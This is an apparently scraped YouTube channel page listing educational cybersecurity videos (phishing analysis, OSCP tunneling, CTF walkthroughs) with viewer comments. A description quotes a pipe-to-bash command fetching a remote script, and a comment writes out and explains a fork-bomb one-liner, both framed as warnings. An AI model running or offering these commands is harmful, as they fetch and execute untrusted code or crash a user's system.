- Видео 33
- Просмотров 19 830
MalwareCube
Добавлен 16 ноя 2014
Cybersecurity, tech, stuff.
github just tried to phish me...
In this video, I share one of the more interesting and clever phishing attempts I've seen in a while. This one’s different: the attacker is using the legitimate GitHub "issues" feature to push their phishing attempt through trusted services.
Watch as we break down how exactly the attacker did it and even uncover what malicious code it tries to social engineer us into running. After doing some classic investigation and IOC extraction, we come to find this campaign is part of the Lumma Stealer malware family!
Watch as we break down how exactly the attacker did it and even uncover what malicious code it tries to social engineer us into running. After doing some classic investigation and IOC extraction, we come to find this campaign is part of the Lumma Stealer malware family!
Просмотров: 697
Видео
this one-liner will crash your system
Просмотров 2,8 тыс.3 месяца назад
Do not 'curl forkbomb.me | bash' :-)
How to Pivot and Tunnel on the OSCP
Просмотров 2,1 тыс.6 месяцев назад
How can we perform lateral movement using a compromised host to reach the internal network? Ligolo-NG is how. Ligolo-NG: github.com/nicocha30/ligolo-ng
How to Fix and Debug Exploit Code
Просмотров 2726 месяцев назад
Sometimes a public exploit you locate contains broken code, throws vague errors, or fails to achieve your intended goal. It's important to be able to troubleshoot and debug these issues effectively; otherwise, you'll find yourself endlessly spinning your wheels. Especially on the OSCP exam. In this video, I aim to demystify the methodology of approaching fixing exploits and explore ways in whic...
Day 17 - I Tawt I Taw A C2 Tat! (TryHackMe Advent of Cyber 2023)
Просмотров 11 тыс.9 месяцев назад
This is a video walkthrough of Day 17 for the Advent of Cyber 2023 event. In today's task, we look at the SiLK suite, and how it can be used to identify network behaviour, patterns, and anomalies. Launch Advent of Cyber: tryhackme.com/r/christmas 0:00 - Introduction and Story 1:25 - Accessing the Machine 2:52 - Network Traffic Data 7:00 - PCAPs vs Network Flows 9:13 - How to Collect and Process...
Learn to Hack For Free | TryHackMe Advent of Cyber 2023
Просмотров 679 месяцев назад
tryhackme.com/christmas #tryhackme #hacking #cybersecurity
Live Phishing Investigation and Response
Просмотров 119Год назад
Join me as I delve into a live investigation of a recent phishing email, exposing its attempt to steal victims' credit card information. I also cover reporting the malicious webpages at the registrar level to (hopefully) hinder their campaign.
NahamCon CTF 2023 - Ninety One
Просмотров 76Год назад
A quick walk-through of the "Ninety One" challenge from the recent 48-Hour NahamCon CTF Competition. NahamCon CTF 2023: ctf.nahamcon.com
NahamCon CTF 2023 - Glasses
Просмотров 87Год назад
A quick walk-through of the "Glasses" challenge from the recent 48-Hour NahamCon CTF Competition. NahamCon CTF 2023: ctf.nahamcon.com
NahamCon CTF 2023 - Fast Hands
Просмотров 140Год назад
A quick walk-through of the "Fast Hands" challenge from the recent 48-Hour NahamCon CTF Competition. NahamCon CTF 2023: ctf.nahamcon.com
NahamCon CTF 2023 - Online Chatroom
Просмотров 193Год назад
A quick walk-through of the "Online Chatroom" challenge from the recent 48-Hour NahamCon CTF Competition. NahamCon CTF 2023: ctf.nahamcon.com
Session Hijacking Attack | Natas: OverTheWire (Level 18)
Просмотров 122Год назад
In Level 18 of OverTheWire's Natas CTF wargame, we are able to leverage a brute-forcing attack to hijack a valid admin PHPSESSID on the webserver. OverTheWire: overthewire.org/wargames/ Writeups: github.com/odacavo/overthewire/tree/main/01_natas Session Hijacking Attack: owasp.org/www-community/attacks/Session_hijacking_attack PHP session_id: www.php.net/manual/en/function.session-id.php 0:00 -...
SQL Injection Timing Attack | Natas: OverTheWire (Level 17)
Просмотров 143Год назад
In Level 17 of OverTheWire's Natas CTF wargame, we are able to leverage the SLEEP() statement in SQL to infer a blind response for our SQL injection in order to brute force the correct password. OverTheWire: overthewire.org/wargames/ Writeups: github.com/odacavo/overthewire/tree/main/01_natas 0:00 - Introduction 0:33 - Source Code Walkthrough 1:57 - Demonstration and Solution 4:40 - Python Solu...
Blind Command Substitution RCE | Natas: OverTheWire (Level 16)
Просмотров 111Год назад
In Level 16 of OverTheWire's Natas CTF wargame, we are able to leverage blind command substitution and brute force automation to get remote code execution on the web server. OverTheWire: overthewire.org/wargames/ Writeups: github.com/odacavo/overthewire/tree/main/01_natas Command Substitution: www.gnu.org/software/bash/manual/html_node/Command-Substitution.html 0:00 - Introduction 0:20 - Source...
Blind SQL Brute Forcing | Natas: OverTheWire (Level 15)
Просмотров 160Год назад
In Level 15 of OverTheWire's Natas CTF wargame, we tackle Blind SQL Injection and brute force a user's password. OverTheWire: overthewire.org/wargames/ Writeups: github.com/odacavo/overthewire/tree/main/01_natas Blind SQL Injection: owasp.org/www-community/attacks/Blind_SQL_Injection Python `string` Module: docs.python.org/3/library/string.html 0:00 - Introduction 0:40 - Source Code Walkthrough...
SQL Injection | Natas: OverTheWire (Level 14)
Просмотров 65Год назад
SQL Injection | Natas: OverTheWire (Level 14)
Magic Bytes & Hex Editing RCE | Natas: OverTheWire (Level 13)
Просмотров 163Год назад
Magic Bytes & Hex Editing RCE | Natas: OverTheWire (Level 13)
File Upload RCE | Natas: OverTheWire (Level 12)
Просмотров 105Год назад
File Upload RCE | Natas: OverTheWire (Level 12)
XOR Deep Dive | Natas: OverTheWire (Level 11)
Просмотров 128Год назад
XOR Deep Dive | Natas: OverTheWire (Level 11)
Filtered PHP Command Injection | Natas: OverTheWire (Level 10)
Просмотров 80Год назад
Filtered PHP Command Injection | Natas: OverTheWire (Level 10)
PHP Command Injection | Natas: OverTheWire (Level 9)
Просмотров 71Год назад
PHP Command Injection | Natas: OverTheWire (Level 9)
PHP Base64 & Hex Decoding | Natas: OverTheWire (Level 8)
Просмотров 131Год назад
PHP Base64 & Hex Decoding | Natas: OverTheWire (Level 8)
Local File Inclusion (LFI) Attacks | Natas: OverTheWire (Level 7)
Просмотров 64Год назад
Local File Inclusion (LFI) Attacks | Natas: OverTheWire (Level 7)
Introduction to Port Scanning | Nmap Essentials
Просмотров 81Год назад
Introduction to Port Scanning | Nmap Essentials
Python Secret POSTing | Natas: OverTheWire (Level 6)
Просмотров 55Год назад
Python Secret POSTing | Natas: OverTheWire (Level 6)
Look to the Cookie! 🍪 | Natas: OverTheWire (Level 5)
Просмотров 110Год назад
Look to the Cookie! 🍪 | Natas: OverTheWire (Level 5)
HTTP Header Manipulating | Natas: OverTheWire (Level 4)
Просмотров 106Год назад
HTTP Header Manipulating | Natas: OverTheWire (Level 4)
Robots.txt | Natas: OverTheWire (Level 3)
Просмотров 67Год назад
Robots.txt | Natas: OverTheWire (Level 3)
Directory Indexing Attacks | Natas: OverTheWire (Level 2)
Просмотров 212Год назад
Directory Indexing Attacks | Natas: OverTheWire (Level 2)
I got the same email. John Hammond made a video about the same "fake captcha" phishing attempt this week too. Was funny to see it in the wild literally the day after watching that video.
Hey, great video! Saw myself in the VT community tab :D Keep it up!
no way, that's really cool! Thank you.
I laughed so hard when i saw "press pasta then enter" asking me to run your malware on my computer for you is crazy lol
Fr
5:48 19/96 vendors spam it malicious and -50 community score for me on virustotal at the moment of writing this comment
And still climbing!
5:48 19/96 vendors spam it malicious and -50 community score for me on virustotal at the moment of writing this comment
Literally at 3:20 I noticed the creation date and 4 seconds late you pointed that out, awesome And woah that captcha and JS was wild Thank you for this great contribution to the community
Thank you! I got lucky with this sample, it was the perfect amount of clever and entertaining
got the same email but mine was from 'thehackingsage/hacktronian'
Great video Andrew, its so unique what Copy Paste can do! John Hammond covered the same technique too!
Hi Andrew, I wanted to ask this during the Cyber Mentor live session, but I missed the notification, unfortunately. Do I need to learn Python and scripting for a SOC analyst role? If so, where should I start?
@NoNoandNo-no yeah it can be useful as you progress in the SOC or move into more engineering roles. I wouldn't put it as a requirement as an entry level analyst (meaning I think there are other areas that should take priority first) but you'll sometimes see it as a "nice to have " on job postings. I can only suggest TCM's python course as personally I haven't taken any others to compare, but I thought it was a great foundation.
Very good walkthrough . Bravo
How well does port scanning run through this? Still hot garbage, or does this work a lot better?
It's way faster than some of the other methods. And you can still run syn scans through it, which if I remember correctly is a limitation with something like Chisel.
THHHEEE new standard.
thanks for this video, this is exactly what i needed. setting up tunnelling feels so confusing for me and you've covered everything i need in this video.
Thanks, I'm so glad to hear! Tunneling can be really confusing and fortunately Ligolo makes it as simple as possible.
Hey man, nice vid, didn't realize Ligolo makes it so simple!
Very cool! Great video
one liner admin is better
?
This was pretty cool.
Tested it on my macbook which is bsd based, and surprisingly there was a level of protection, so it didn't crash my system interestingly enough! Great video!
Greta video, honestly. Well-spoken, confident, nice editing. Wish you look at growing big
Why make it so unnecessarily complex? Just keep it simple and run "make -j"
This was nice.😅
I don't get why there's a pipilne there. Like I always thought that command1 | command2 redirects the output of the command1 to the input of the command2 Why is it :|: and not something like :&&: ???
Great question, and you're correct about the pipe. In this case, the actual data or output being passed through the pipe is not used. If a process takes nothing into stdin, you can still pipe to it. Using && would make the second call dependent on the successful completion of the first call, and so the pipe is used to execute both recursive calls in parallel without conditions. To your point, ":(){ :&:; }; :" will also work in most cases.
@@MalwareCube thx for making this clear
Making that function more readable is an awesome way of teaching what it does.
So basically a nuclear bomb
iirc most distros using systemd mitigate forkbombs by setting a ulimit
Yep, you can set limits on systemd unit files, and you can also set a ulimit to a smaller value in login scripts.
why no comments man
I just tried this out using your video. What a game changer! Thanks!
W00t! I'm super glad it was helpful, that's awesome to see
Loved the idea of showing WireShark, I don’t see that being showcased enough when debugging why scripts don’t work out of the box
Love this video man, keep it up!
Thank you, sincerely!
This is the best walkthrough, thanks man
Thank you for the walkthrough! It was realy clear, and you made it easy to understand the meaning of each step (I find it most important)
Thank you for your nice Video. :)
This was an amazing presentation. This task was a huge boring wall of text, there is no way I would have done this without your help. Thank you.
thorough but bit long for beginners
Excellent walkthrough.. thanks a lot!!
great walkthrough Thumbs up!
💥
Superb presentation with great tips, hints, explanations, deep dives, and process flow! Subscribed!
Thank you!